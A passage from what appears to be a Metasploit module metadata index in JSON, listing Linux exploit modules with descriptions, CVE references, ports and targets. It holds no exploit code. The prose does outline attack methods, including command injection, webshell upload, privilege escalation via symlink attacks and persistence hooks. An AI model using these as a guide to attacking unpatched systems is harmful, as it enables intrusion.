"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command execution vulnerability in WAN Emulator\n version 2.3 which can be abused to allow unauthenticated users to execute\n arbitrary commands under the context of the 'www-data' user.\n The 'result.php' script calls shell_exec() with user controlled data\n from the 'pc' parameter. This module also exploits a command execution\n vulnerability to gain root privileges. The 'dosu' binary is suid 'root'\n and vulnerable to command execution in argument one.",
"references": [
"OSVDB-85344",
"OSVDB-85345"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/wanem_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/wanem_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/wd_mycloud_multiupload_upload": {
"name": "Western Digital MyCloud multi_uploadify File Upload Vulnerability",
"full_name": "exploit/linux/http/wd_mycloud_multiupload_upload",
"rank": 600,
"disclosure_date": "2017-07-29",
"type": "exploit",
"author": [
"Zenofex <zenofex@exploitee.rs>"
],
"description": "This module exploits a file upload vulnerability found in Western Digital's MyCloud\n NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php\n PHP script provides multipart upload functionality that is accessible without authentication\n and can be used to place a file anywhere on the device's file system. This allows an\n attacker the ability to upload a PHP shell onto the device and obtain arbitrary code\n execution as root.",
"references": [
"URL-https://www.exploitee.rs/index.php/Western_Digital_MyCloud#.2Fjquery.2Fuploader.2Fmulti_uploadify.php_.28added_08.2F06.2F2017.29",
"URL-https://download.exploitee.rs/file/generic/Exploiteers-DEFCON25.pdf",
"URL-https://www.youtube.com/watch?v=EO_49pfmA5A",
"CVE-2017-17560"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2017-12-13 18:50:21 +0000",
"path": "/modules/exploits/linux/http/wd_mycloud_multiupload_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/wd_mycloud_multiupload_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/webcalendar_settings_exec": {
"name": "WebCalendar 1.2.4 Pre-Auth Remote Code Injection",
"full_name": "exploit/linux/http/webcalendar_settings_exec",
"rank": 600,
"disclosure_date": "2012-04-23",
"type": "exploit",
"author": [
"EgiX",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or\n less. If not removed, the settings.php script meant for installation can be\n update by an attacker, and then inject code in it. This allows arbitrary code\n execution as www-data.",
"references": [
"CVE-2012-1495",
"OSVDB-81329",
"EDB-18775"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WebCalendar 1.2.4 on Linux"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/webcalendar_settings_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/webcalendar_settings_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/webid_converter": {
"name": "WeBid converter.php Remote PHP Code Injection",
"full_name": "exploit/linux/http/webid_converter",
"rank": 600,
"disclosure_date": "2011-07-05",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in WeBid version 1.0.2.\n By abusing the converter.php file, a malicious user can inject PHP code\n in the includes/currencies.php script without any authentication, which\n results in arbitrary code execution.",
"references": [
"OSVDB-73609",
"EDB-17487",
"URL-http://www.webidsupport.com/forums/showthread.php?3892"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WeBid 1.0.2 / Ubuntu"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/webid_converter.rb",
"is_install_path": true,
"ref_name": "linux/http/webid_converter",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/wipg1000_cmd_injection": {
"name": "WePresent WiPG-1000 Command Injection",
"full_name": "exploit/linux/http/wipg1000_cmd_injection",
"rank": 600,
"disclosure_date": "2017-04-20",
"type": "exploit",
"author": [
"Matthias Brun"
],
"description": "This module exploits a command injection vulnerability in an undocumented\n CGI file in several versions of the WePresent WiPG-1000 devices.\n Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.",
"references": [
"URL-https://www.redguard.ch/advisories/wepresent-wipg1000.txt"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WiPG-1000 <=2.0.0.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/wipg1000_cmd_injection.rb",
"is_install_path": true,
"ref_name": "linux/http/wipg1000_cmd_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/xplico_exec": {
"name": "Xplico Remote Code Execution",
"full_name": "exploit/linux/http/xplico_exec",
"rank": 600,
"disclosure_date": "2017-10-29",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal\n command under the context of the root user.\n\n The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet\n traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create\n a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try\n to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation.\n But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.\n\n One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum\n of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.",
"references": [
"CVE-2017-16666",
"URL-https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/",
"URL-https://www.xplico.org/archives/1538"
],
"platform": "Unix",
"arch": "cmd",
"rport": 9876,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-15 01:04:06 +0000",
"path": "/modules/exploits/linux/http/xplico_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/xplico_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/zabbix_sqli": {
"name": "Zabbix 2.0.8 SQL Injection and Remote Code Execution",
"full_name": "exploit/linux/http/zabbix_sqli",
"rank": 600,
"disclosure_date": "2013-09-23",
"type": "exploit",
"author": [
"Lincoln <Lincoln@corelan.be>",
"Jason Kratzer <pyoor@corelan.be>"
],
"description": "This module exploits an unauthenticated SQL injection vulnerability affecting Zabbix\n versions 2.0.8 and lower. The SQL injection issue can be abused in order to retrieve an\n active session ID. If an administrator level user is identified, remote code execution\n can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file.",
"references": [
"CVE-2013-5743",
"URL-https://support.zabbix.com/browse/ZBX-7091"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Zabbix version <= 2.0.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/zabbix_sqli.rb",
"is_install_path": true,
"ref_name": "linux/http/zabbix_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/zen_load_balancer_exec": {
"name": "ZEN Load Balancer Filelog Command Execution",
"full_name": "exploit/linux/http/zen_load_balancer_exec",
"rank": 600,
"disclosure_date": "2012-09-14",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in ZEN Load Balancer\n version 2.0 and 3.0-rc1 which could be abused to allow authenticated users\n to execute arbitrary code under the context of the 'root' user.\n The 'content2-2.cgi' file uses user controlled data from the 'filelog'\n parameter within backticks.",
"references": [
"OSVDB-85654",
"URL-http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 444,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/zen_load_balancer_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/zen_load_balancer_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/zenoss_showdaemonxmlconfig_exec": {
"name": "Zenoss 3 showDaemonXMLConfig Command Execution",
"full_name": "exploit/linux/http/zenoss_showdaemonxmlconfig_exec",
"rank": 400,
"disclosure_date": "2012-07-30",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command execution vulnerability in Zenoss 3.x\n which could be abused to allow authenticated users to execute arbitrary\n code under the context of the 'zenoss' user. The show_daemon_xml_configs()\n function in the 'ZenossInfo.py' script calls Popen() with user\n controlled data from the 'daemon' parameter.",
"references": [
"URL-http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/",
"OSVDB-84408"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/zenoss_showdaemonxmlconfig_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/zimbra_xxe_rce": {
"name": "Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF",
"full_name": "exploit/linux/http/zimbra_xxe_rce",
"rank": 600,
"disclosure_date": "2019-03-13",
"type": "exploit",
"author": [
"An Trinh",
"Khanh Viet Pham",
"Jacob Robles"
],
"description": "This module exploits an XML external entity vulnerability and a\n server side request forgery to get unauthenticated code execution\n on Zimbra Collaboration Suite. The XML external entity vulnerability\n in the Autodiscover Servlet is used to read a Zimbra configuration\n file that contains an LDAP password for the 'zimbra' account. The\n zimbra credentials are then used to get a user authentication cookie\n with an AuthRequest message. Using the user cookie, a server side request\n forgery in the Proxy Servlet is used to proxy an AuthRequest with\n the 'zimbra' credentials to the admin port to retrieve an admin\n cookie. After gaining an admin cookie the Client Upload servlet is\n used to upload a JSP webshell that can be triggered from the web\n server to get command execution on the host. The issues reportedly\n affect Zimbra Collaboration Suite v8.5 to v8.7.11.\n\n This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64\n UBUNTU16_64 FOSS edition.",
"references": [
"CVE-2019-9670",
"CVE-2019-9621",
"URL-https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html"
],
"platform": "Linux",
"arch": "java",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-01 17:21:23 +0000",
"path": "/modules/exploits/linux/http/zimbra_xxe_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/zimbra_xxe_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ids/alienvault_centerd_soap_exec": {
"name": "AlienVault OSSIM av-centerd Command Injection",
"full_name": "exploit/linux/ids/alienvault_centerd_soap_exec",
"rank": 600,
"disclosure_date": "2014-05-05",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in AlienVault 4.6.1 and\n prior. The vulnerability exists in the av-centerd SOAP web service,\n where the update_system_info_debian_package method uses perl backticks\n in an insecure way, allowing command injection. This module has been\n tested successfully on AlienVault 4.6.0.",
"references": [
"CVE-2014-3804",
"BID-67999",
"ZDI-14-202",
"URL-http://forums.alienvault.com/discussion/2690"
],
"platform": "Unix",
"arch": "cmd",
"rport": 40007,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"AlienVault <= 4.6.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb",
"is_install_path": true,
"ref_name": "linux/ids/alienvault_centerd_soap_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ids/snortbopre": {
"name": "Snort Back Orifice Pre-Preprocessor Buffer Overflow",
"full_name": "exploit/linux/ids/snortbopre",
"rank": 400,
"disclosure_date": "2005-10-18",
"type": "exploit",
"author": [
"KaiJern Lau <xwings@mysec.org>"
],
"description": "This module exploits a stack buffer overflow in the Back Orifice pre-processor module\n included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could\n be used to completely compromise a Snort sensor, and would typically gain an attacker\n full root or administrative privileges.",
"references": [
"CVE-2005-3252",
"OSVDB-20034",
"BID-15131"
],
"platform": "Linux",
"arch": "",
"rport": 9080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Debian 3.1 Sarge"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/ids/snortbopre.rb",
"is_install_path": true,
"ref_name": "linux/ids/snortbopre",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/imap/imap_uw_lsub": {
"name": "UoW IMAP Server LSUB Buffer Overflow",
"full_name": "exploit/linux/imap/imap_uw_lsub",
"rank": 400,
"disclosure_date": "2000-04-16",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the 'LSUB'\n command of the University of Washington IMAP service.\n This vulnerability can only be exploited with a valid username\n and password.",
"references": [
"CVE-2000-0284",
"OSVDB-12037",
"BID-1110",
"EDB-284"
],
"platform": "Linux",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux Bruteforce"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/linux/imap/imap_uw_lsub.rb",
"is_install_path": true,
"ref_name": "linux/imap/imap_uw_lsub",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/abrt_raceabrt_priv_esc": {
"name": "ABRT raceabrt Privilege Escalation",
"full_name": "exploit/linux/local/abrt_raceabrt_priv_esc",
"rank": 600,
"disclosure_date": "2015-04-14",
"type": "exploit",
"author": [
"Tavis Ormandy",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems with\n a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured\n as the crash handler.\n\n A race condition allows local users to change ownership of arbitrary\n files (CVE-2015-3315). This module uses a symlink attack on\n `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`,\n then adds a new user with UID=0 GID=0 to gain root privileges.\n Winning the race could take a few minutes.\n\n This module has been tested successfully on:\n\n abrt 2.1.11-12.el7 on RHEL 7.0 x86_64;\n abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64;\n abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64;\n abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64;\n abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64.",
"references": [
"CVE-2015-3315",
"EDB-36747",
"BID-75117",
"URL-https://gist.github.com/taviso/fe359006836d6cd1091e",
"URL-http://www.openwall.com/lists/oss-security/2015/04/14/4",
"URL-http://www.openwall.com/lists/oss-security/2015/04/16/12",
"URL-https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92",
"URL-https://access.redhat.com/security/cve/cve-2015-1862",
"URL-https://access.redhat.com/security/cve/cve-2015-3315",
"URL-https://access.redhat.com/articles/1415483",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1211223",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1211835",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1218239"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-04-18 09:01:51 +0000",
"path": "/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/abrt_raceabrt_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/af_packet_chocobo_root_priv_esc": {
"name": "AF_PACKET chocobo_root Privilege Escalation",
"full_name": "exploit/linux/local/af_packet_chocobo_root_priv_esc",
"rank": 400,
"disclosure_date": "2016-08-12",
"type": "exploit",
"author": [
"rebel",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a race condition and use-after-free in the\n packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\n the Linux kernel to execute code as root (CVE-2016-8655).\n\n The bug was initially introduced in 2011 and patched in 2016 in version\n 4.4.0-53.74, potentially affecting a large number of kernels; however\n this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\n Linux Mint.\n\n The target system must have unprivileged user namespaces enabled,\n two or more CPU cores, and SMAP must be disabled.\n\n Bypasses for SMEP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on Linux Mint 17.3 (x86_64);\n Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel\n versions 4.4.0-45-generic and 4.4.0-51-generic.",
"references": [
"EDB-40871",
"CVE-2016-8655",
"BID-94692",
"URL-https://seclists.org/oss-sec/2016/q4/607",
"URL-https://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin",
"URL-https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c",
"URL-https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c",
"URL-https://usn.ubuntu.com/3151-1/",
"URL-https://www.securitytracker.com/id/1037403",
"URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/af_packet_chocobo_root_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"chocobo_root.c"
]
}
},
"exploit_linux/local/af_packet_packet_set_ring_priv_esc": {
"name": "AF_PACKET packet_set_ring Privilege Escalation",
"full_name": "exploit/linux/local/af_packet_packet_set_ring_priv_esc",
"rank": 400,
"disclosure_date": "2017-03-29",
"type": "exploit",
"author": [
"Andrey Konovalov",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a heap-out-of-bounds write in the packet_set_ring\n function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel\n to execute code as root (CVE-2017-7308).\n\n The bug was initially introduced in 2011 and patched in version 4.10.6,\n potentially affecting a large number of kernels; however this exploit\n targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,\n including Linux distros based on Ubuntu Xenial, such as Linux Mint.\n\n The target system must have unprivileged user namespaces enabled and\n two or more CPU cores.\n\n Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on Linux Mint 18 (x86_64)\n with kernel versions:\n\n 4.8.0-34-generic;\n 4.8.0-36-generic;\n 4.8.0-39-generic;\n 4.8.0-41-generic;\n 4.8.0-42-generic;\n 4.8.0-44-generic;\n 4.8.0-45-generic.",
"references": [
"EDB-41994",
"CVE-2017-7308",
"BID-97234",
"URL-https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html",
"URL-https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308",
"URL-https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html",
"URL-https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c",
"URL-https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/af_packet_packet_set_ring_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/apport_abrt_chroot_priv_esc": {
"name": "Apport / ABRT chroot Privilege Escalation",
"full_name": "exploit/linux/local/apport_abrt_chroot_priv_esc",
"rank": 600,
"disclosure_date": "2015-03-31",
"type": "exploit",
"author": [
"Stéphane Graber",
"Tavis Ormandy",
"Ricardo F. Teixeira",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems by\n invoking the default coredump handler inside a namespace (\"container\").\n\n Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are\n vulnerable, due to a feature which allows forwarding reports to\n a container's Apport by changing the root directory before loading\n the crash report, causing `usr/share/apport/apport` within the crashed\n task's directory to be executed.\n\n Similarly, Fedora is vulnerable when the kernel crash handler is\n configured to change root directory before executing ABRT, causing\n `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be\n executed.\n\n In both instances, the crash handler does not drop privileges,\n resulting in code execution as root.\n\n This module has been tested successfully on Apport 2.14.1 on\n Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.",
"references": [
"CVE-2015-1318",
"URL-http://www.openwall.com/lists/oss-security/2015/04/14/4",
"EDB-36782",
"EDB-36746",
"URL-https://gist.github.com/taviso/0f02c255c13c5c113406",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1211223",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1211835",
"URL-https://usn.ubuntu.com/usn/USN-2569-1/",
"URL-https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893",
"URL-https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758",
"URL-http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-04-19 17:13:57 +0000",
"path": "/modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/apport_abrt_chroot_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/apt_package_manager_persistence": {
"name": "APT Package Manager Persistence",
"full_name": "exploit/linux/local/apt_package_manager_persistence",
"rank": 600,
"disclosure_date": "1999-03-09",
"type": "exploit",
"author": [
"Aaron Ringo"
],
"description": "This module will run a payload when the package manager is used. No\n handler is ran automatically so you must configure an appropriate\n exploit/multi/handler to connect. This module creates a pre-invoke hook\n for APT in apt.conf.d. The hook name syntax is numeric followed by text.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-26 13:11:40 +0000",
"path": "/modules/exploits/linux/local/apt_package_manager_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/apt_package_manager_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/asan_suid_executable_priv_esc": {
"name": "AddressSanitizer (ASan) SUID Executable Privilege Escalation",
"full_name": "exploit/linux/local/asan_suid_executable_priv_esc",
"rank": 600,
"disclosure_date": "2016-02-17",
"type": "exploit",
"author": [
"Szabolcs Nagy",
"infodox",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems using\n setuid executables compiled with AddressSanitizer (ASan).\n\n ASan configuration related environment variables are permitted when\n executing setuid executables built with libasan. The `log_path` option\n can be set using the `ASAN_OPTIONS` environment variable, allowing\n clobbering of arbitrary files, with the privileges of the setuid user.\n\n This module uploads a shared object and sprays symlinks to overwrite\n `/etc/ld.so.preload` in order to create a setuid root shell.",
"references": [
"URL-https://seclists.org/oss-sec/2016/q1/363",
"URL-https://seclists.org/oss-sec/2016/q1/379",
"URL-https://gist.github.com/0x27/9ff2c8fb445b6ab9c94e",
"URL-https://github.com/bcoles/local-exploits/tree/master/asan-suid-root"
],
"platform": "Linux",
"arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-12 09:14:20 +0000",
"path": "/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/asan_suid_executable_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"unsanitary.sh"
]
}
},
"exploit_linux/local/autostart_persistence": {
"name": "Autostart Desktop Item Persistence",
"full_name": "exploit/linux/local/autostart_persistence",
"rank": 600,
"disclosure_date": "2006-02-13",
"type": "exploit",
"author": [
"Eliott Teissonniere"
],
"description": "This module will create an autostart entry to execute a payload.\n The payload will be executed when the users logs in.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-20 17:51:41 +0000",
"path": "/modules/exploits/linux/local/autostart_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/autostart_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/blueman_set_dhcp_handler_dbus_priv_esc": {
"name": "blueman set_dhcp_handler D-Bus Privilege Escalation",
"full_name": "exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
"rank": 600,
"disclosure_date": "2015-12-18",
"type": "exploit",
"author": [
"Sebastian Krahmer",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges by exploiting a Python\n code injection vulnerability in blueman versions prior to 2.0.3.\n\n The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the\n `set_dhcp_handler` function which uses user input in a call to `eval`,\n without sanitization, resulting in arbitrary code execution as root.\n\n This module has been tested successfully with blueman version 1.23\n on Debian 8 Jessie (x64).",
"references": [
"BID-79688",
"CVE-2015-8612",
"URL-https://twitter.com/thegrugq/status/677809527882813440",
"URL-https://github.com/blueman-project/blueman/issues/416",
"URL-https://www.openwall.com/lists/oss-security/2015/12/18/6",
"URL-https://www.debian.org/security/2015/dsa-3427",
"URL-https://bugs.mageia.org/show_bug.cgi?id=17361",
"URL-http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085"
],
"platform": "Linux",
"arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-20 09:18:43 +0000",
"path": "/modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/bpf_priv_esc": {
"name": "Linux BPF doubleput UAF Privilege Escalation",
"full_name": "exploit/linux/local/bpf_priv_esc",
"rank": 400,
"disclosure_date": "2016-05-04",
"type": "exploit",
"author": [
"jannh <jannh@google.com>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)\n does not properly reference count file descriptors, resulting\n in a use-after-free, which can be abused to escalate privileges.\n\n The target system must be compiled with `CONFIG_BPF_SYSCALL`\n and must not have `kernel.unprivileged_bpf_disabled` set to 1.\n\n This module has been tested successfully on:\n\n Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel);\n Ubuntu 16.04 (x64) kernel 4.4.0-38-generic;\n Ubuntu 16.04 (x64) kernel 4.4.0-42-generic;\n Ubuntu 16.04 (x64) kernel 4.4.0-98-generic;\n Ubuntu 16.04 (x64) kernel 4.4.0-140-generic.",
"references": [
"BID-90309",
"CVE-2016-4557",
"EDB-39772",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=808",
